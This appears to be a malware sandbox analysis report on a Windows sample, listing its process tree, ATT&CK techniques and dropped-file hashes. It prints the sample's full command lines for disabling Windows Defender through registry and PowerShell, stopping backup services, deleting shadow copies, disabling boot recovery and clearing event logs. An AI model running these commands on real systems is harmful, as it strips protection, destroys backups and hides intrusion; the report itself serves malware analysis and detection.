PID 3912 wrote to memory of 2900	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 1496	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 1496	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 2376	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 2376	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 4832	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 4832	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 436	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 436	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 4156	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 4156	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 2572	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 2572	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 3308	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 3308	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 2360	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 2360	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 2908	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 2908	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 4712	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe
PID 3912 wrote to memory of 4712	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
3⤵
PID:2672

C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
3⤵
PID:3168

C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
3⤵
PID:4664

C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:5044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
3⤵
PID:1468

C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
3⤵
PID:2960

C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
3⤵
PID:1940

C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
3⤵
PID:8

C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_21a58" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_21a58" /y
3⤵
PID:2368

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
- Launches sc.exe
PID:3528

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
- Launches sc.exe
PID:4992

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
- Launches sc.exe
PID:4200

C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
- Launches sc.exe
PID:3108

C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
2⤵
- Launches sc.exe
PID:4316

C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
- Launches sc.exe
PID:2900

C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
- Launches sc.exe
PID:1496

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_21a58" start= disabled
2⤵
- Launches sc.exe
PID:2376

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4832

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
PID:436

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:4156

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:2572

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:3308

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2360

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2908

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4712

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2892

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:5056

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:1484

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:1992

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:4136

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:2972

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:4920

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:2720

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:3708

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:2236

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:3240

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:1820

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:2404

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:3256

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:1256

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:2940

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:4576

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1924

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:2336

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:904

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4340

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4144

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2232

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
- Modifies security service
PID:2476

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3356

C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:2280

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:60

C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4588

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:3360

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:4956

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:1976

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:2052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1728

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=2240,i,16875000905773190493,11379096115878622792,262144 --variations-seed-version /prefetch:8
1⤵
PID:4464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Privilege Escalation

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Defense Evasion

Impair Defenses

1

T1562

Disable or Modify Tools

1

T1562.001

Indicator Removal

3

T1070

File Deletion

Modify Registry

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

3

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_angny01p.ovc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1728-4-0x0000023FC0690000-0x0000023FC06B2000-memory.dmp

Filesize
136KB

Download
memory/1728-14-0x00007FFBC4EC0000-0x00007FFBC5981000-memory.dmp

Filesize
10.8MB

Download
memory/1728-16-0x0000023FC0610000-0x0000023FC0620000-memory.dmp

Filesize
64KB

Download
memory/1728-15-0x0000023FC0610000-0x0000023FC0620000-memory.dmp

Filesize
64KB

Download
memory/1728-19-0x00007FFBC4EC0000-0x00007FFBC5981000-memory.dmp

Filesize
10.8MB

Download
memory/2960-33-0x00000157B5ED0000-0x00000157B5EE0000-memory.dmp

Filesize
64KB

Download
memory/2960-34-0x00000157B5ED0000-0x00000157B5EE0000-memory.dmp

Filesize
64KB

Download
memory/2960-22-0x00000157B5ED0000-0x00000157B5EE0000-memory.dmp

Filesize
64KB

Download
memory/2960-21-0x00007FFBC4FE0000-0x00007FFBC5AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-36-0x00007FFBC4FE0000-0x00007FFBC5AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3912-2125-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-0-0x0000012062380000-0x0000012062584000-memory.dmp

Filesize
2.0MB

Download
memory/3912-801-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-938-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-1-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-2246-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-2263-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-2287-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-3574-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-5844-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-6025-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-6026-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-6028-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads